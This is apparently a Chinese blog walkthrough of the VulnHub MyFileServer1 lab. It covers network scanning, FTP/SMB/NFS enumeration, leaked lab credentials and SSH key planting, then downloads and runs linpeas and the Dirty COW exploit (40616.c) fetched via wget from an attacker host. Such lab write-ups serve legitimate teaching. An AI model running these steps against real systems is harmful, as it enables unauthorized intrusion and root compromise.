MyFileServer1 打靶

OneZ3r0 Lv3

前言

vulnhub上还是有很多单靶机的,和正常web思维比较贴合,适合入门感受一下
这次主要是文件服务+内核提权

信息收集

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
sudo nmap -sn 192.168.56.0/24
-sn # ping扫描,主机发现后不进行端口扫描 no port scan,允许轻量的侦察
0 # 网络地址(主机部分全为0,用于表示子网) 1为主机地址

sudo arp-scan -l # 扫描本地网络

sudo nmap -sT --min-rate 10000 -p- 192.168.56.128 -oA nmapscan/ports
-sT # TCP协议SYN探测端口
- # 全部端口
-oA # 全格式输出

grep open nmapscan/ports.nmap | awk -F'/' '{print $1}' | paste -sd ','
ports=$(grep open nmapscan/ports.nmap | awk -F'/' '{print $1}' | paste -sd ',') # 端口号变量

sudo nmap -sT -sV -sC -O -p$ports 192.168.56.128 -oA nmapscan/detail
-sV # version
-sC # script
-O # operation system

sudo nmap -sU --top-ports 20 192.168.56.128 -oA nmapscan/udp
-sU # udp

sudo nmap --script=vuln -p$ports 192.168.56.128 -oA nmapscan/vuln # 默认脚本扫描

文件服务渗透

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
sudo ftp 192.168.56.128 port # 默认21

binary # 转换模式

get # 下载文件
put # 上传文件


sudo smbmap -H 192.168.56.128 # server message block
-H # host

sudo smbclient //192.168.56.128/smbdata

get put

cat secure, sshd_config # 看日志,配置文件等

vim cred1.txt
smbuser:chauthtok

showmount -e 192.168.56.128 # nfs共享文件


# 目录扫描
sudo gobuster dir -u http://192.168.56.128 -x txt,rar,zip,tar,sql -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt

-x # extension
-w # wordlist

smbuser:rootroot1

# 登录ftp 上传公钥
# 存储位置 在sshd_config写明了 .ssh/authorized_keys

sudo ssh-keygen
# 随便写username(文件名),密码不写

put onez3r0.pub authorized_keys

sudo ssh -i onez3r0 [email protected]
# 私钥登录

内核提权

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
uname -a # print system info
export TERM=xterm-color # 确保能清屏

sudo -l # 查看sudo权限
# 没有密码不行

cat /etc/crontab # 查看定时任务

find / -perm -u=s -type f 2>/dev/null
-perm # 权限
-u=s # suid位
-type f # 文件
2>/dev/null # 2 stderr

# 主机
cp /usr/share/peass/linpeas/linpeas.sh ./ # 复制linpeas

searchsploit kernel 3.10 Privilege Escalation
searchsploit dirty cow
searchsploit kernel -m 40616.c
-m # mirrors

vim 40616.c

php -S 0:80 # 开放服务

# 靶机
cd /tmp
wget http://192.168.56.129/linpeas.sh # 从主机下载
chmod +x linpeas.sh
./linpeas.sh # 看Executing Linux Exploit Suggester部分

wget http://192.168.56.129/40616.c
gcc 40616.c -o 40616 -pthread # 编译

./40616 # 运行提权
  • 标题: MyFileServer1 打靶
  • 作者: OneZ3r0
  • 创建于 : 2025-06-28 12:24:01
  • 更新于 : 2025-07-29 18:03:58
  • 链接: https://blog.onez3r0.top/2025/06/28/vulnhub-myfileserver1-walkthrough/
  • 版权声明: 本文章采用 CC BY-NC-SA 4.0 进行许可。